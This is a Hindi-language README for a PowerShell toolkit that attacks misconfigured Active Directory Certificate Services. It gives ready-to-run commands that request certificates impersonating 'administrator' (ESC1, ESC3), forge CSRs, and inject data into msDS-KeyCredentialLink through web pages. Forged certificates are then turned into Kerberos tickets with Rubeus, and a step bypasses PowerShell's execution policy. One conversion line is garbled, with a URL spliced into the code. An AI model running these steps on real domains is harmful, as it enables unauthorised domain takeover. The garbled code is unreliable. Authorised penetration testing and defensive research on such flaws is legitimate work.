
यहाँ AD CS शोषण से संबंधित सामग्री दी गई है
Certi-Bhai एक्टिव डायरेक्टरी सर्टिफिकेट सर्विसेज (AD CS) कमजोरियों पर हमला करने के लिए PowerShell एक्सप्लॉइटेशन टूल्स का एक व्यापक संग्रह है। यह टूलकिट विभिन्न एस्केलेशन सिनेरियो (ESC) लागू करता है जो ADCS वातावरण में महत्वपूर्ण सुरक्षा गलत कॉन्फ़िगरेशन प्रदर्शित करते हैं।
एक्टिव डायरेक्टरी सर्टिफिकेट सर्विसेज (AD CS) अक्सर गलत कॉन्फ़िगर किया जाता है, जिससे कई हमले के वेक्टर बनते हैं। Certi-Bhai सामान्य ADCS कमजोरियों के सुरक्षा परीक्षण और अनुसंधान के लिए व्यावहारिक एक्सप्लॉइटेशन स्क्रिप्ट और उपयोगिताएँ प्रदान करता है।
केवल अधिकृत परीक्षण वातावरण में जिम्मेदारी से उपयोग करें।
# एक्टिव डायरेक्टरी मॉड्यूल (वैकल्पिक, बेहतर कार्यक्षमता के लिए)
Import-Module ActiveDirectory
कमजोरी: सर्टिफिकेट टेम्पलेट मनमाने SubjectAltName (SAN) मानों के साथ एनरोलमेंट की अनुमति देते हैं।
यह क्या करता है: अत्यधिक अनुमत टेम्पलेट द्वारा हस्ताक्षरित सर्टिफिकेट बनाता है, जिससे आप डोमेन में किसी भी उपयोगकर्ता या कंप्यूटर की पहचान कर सकते हैं।
उपयोग:
# ESC1 निर्देशिका पर जाएं
cd ESC1
# एक्सप्लॉइटेशन स्क्रिप्ट चलाएं
.
\esc1.ps1 -subjectName "CN=administrator,CN=Users,DC=indishell,DC=lab" `
-templateName "vuln" `
-altName "administrator" `
-pfxPass "password123"
पैरामीटर:
-subjectName: लक्षित उपयोगकर्ता का पूर्ण विशिष्ट नाम (DN)-templateName: कमजोर सर्टिफिकेट टेम्पलेट का नाम-altName: अनुरोध करने के लिए वैकल्पिक नाम (उपयोगकर्ता/कंप्यूटर)-pfxPass: PFX निर्यात के लिए पासवर्डआउटपुट: Rubeus जैसे टूल्स के साथ उपयोग के लिए Base64-एन्कोडेड PFX सर्टिफिकेट
वीडियो ट्यूटोरियल: https://www.youtube.com/watch?v=l0gMw_mO4dw
कमजोरी: सर्टिफिकेट अनुरोध एजेंट किसी भी उपयोगकर्ता की ओर से सर्टिफिकेट अनुरोध कर सकते हैं।
यह क्या करता है: सर्टिफिकेट अनुरोध एजेंट के रूप में सर्टिफिकेट एनरोल करता है, फिर मनमाने प्रिंसिपलों के लिए सर्टिफिकेट अनुरोध करता है।
उपयोग:
# ESC3 निर्देशिका पर जाएं
cd ESC3
# एक्सप्लॉइटेशन स्क्रिप्ट चलाएं
.
\esc3_working.ps1 -templateName "CEOTemplate" `
-target_user "administrator" `
-domain "INDISHELL" `
-pfxPass "password123"
पैरामीटर:
-templateName: कमजोर अनुरोध एजेंट टेम्पलेट-target_user: सर्टिफिकेट अनुरोध करने के लिए प्रिंसिपल-domain: डोमेन नाम-pfxPass: PFX पासवर्डआउटपुट: base64 एन्कोडिंग के साथ एडमिनिस्ट्रेटर सर्टिफिकेट (PFX)
वीडियो ट्यूटोरियल: https://www.youtube.com/watch?v=fGjrM-JKnoM
कमजोरी: एप्लिकेशन पॉलिसी इंजेक्शन।
cd CSR_Generate
# सर्टिफिकेट साइनिंग अनुरोध जनरेट करें
.
\csr_short.ps1 -subjectName "CN=admin,CN=Users,DC=domain,DC=local" `
-altName "admin"
# CA को CSR सबमिट करें
.
\csr_submit.ps1 -csr $csr `
-templateName "User" `
-caServer "ca-server.domain.local"
cert.aspx वेब इंटरफेस AD CS RPC एंडपॉइंट से सर्टिफिकेट अनुरोध करने के लिए उपयोगकर्ता-अनुकूल फॉर्म प्रदान करता है:
http://your-iis-server/cert.aspx
वेब इंटरफेस के माध्यम से LDAP विशेषताओं को संशोधित करें। यह स्क्रिप्ट मूल रूप से msDS-KeyCredentialLink विशेषता में ब्लॉब इंजेक्ट करने के लिए उपयोग की जाती है:
http://your-iis-server/ldap_update.aspx
विशेषताएँ:
.
\ESC1/esc1.ps1 -subjectName "CN=admin,CN=Users,DC=indishell,DC=lab" `
-templateName "User" `
-altName "administrator" `
-pfxPass "P@ssw0rd!"
# Rubeus के लिए PFX को उपयोग योग्य प्रारूप में बदलें
$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2("cert.pfx", "password")
[Convert]:https://raw.githubusercontent.com/incredibleindishell/certi-bhai/main/:ToBase64String($cert.RawData)
Rubeus.exe asktgt /user:administrator /certificate:$base64cert /nowrap
प्रश्न: स्क्रिप्ट निष्पादन अवरुद्ध है
# PowerShell को एडमिनिस्ट्रेटर के रूप में चलाएं
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
प्रश्न: सर्टिफिकेट टेम्पलेट नहीं मिला
प्रश्न: LDAP कनेक्शन विफल हो जाता है
कोई समस्या मिली या सुधार के सुझाव हैं? कृपया जिम्मेदारी से रिपोर्ट करें।